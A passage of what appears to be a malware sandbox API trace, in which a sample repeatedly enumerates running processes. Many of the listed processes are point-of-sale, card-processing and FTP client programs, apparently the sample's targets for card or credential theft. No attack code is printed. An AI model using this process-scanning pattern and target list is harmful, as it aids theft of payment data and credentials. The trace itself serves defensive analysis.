lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0285.831] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0285.832] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0285.852] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0285.854] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0285.855] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0285.857] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0285.858] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0285.860] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0285.862] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0285.863] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0285.864] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0285.866] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0285.868] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0285.869] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0285.874] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0285.876] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0285.877] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0285.879] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0285.880] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0285.882] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0285.884] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0285.885] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0285.889] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0285.891] CloseHandle (hObject=0x224c) returned 1 [0285.891] Sleep (dwMilliseconds=0x64) [0285.997] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0286.008] Process32First (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.010] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0286.012] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0286.016] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.017] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0286.019] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0286.021] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0286.024] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0286.030] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0286.032] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.035] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.037] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0286.039] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.093] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.096] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.098] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.101] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.103] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.109] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.112] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0286.114] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0286.116] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0286.118] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.123] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0286.126] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0286.128] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0286.130] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0286.139] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0286.141] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0286.143] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0286.146] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.148] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0286.150] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0286.156] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0286.159] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0286.161] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0286.164] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0286.166] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0286.172] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0286.174] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0286.176] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0286.179] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0286.181] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0286.238] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0286.241] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0286.243] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0286.249] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0286.252] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0286.254] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0286.256] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0286.259] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0286.265] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0286.268] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0286.270] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0286.273] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0286.275] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0286.317] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0286.320] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0286.322] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0286.329] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0286.332] Process32Next (in: 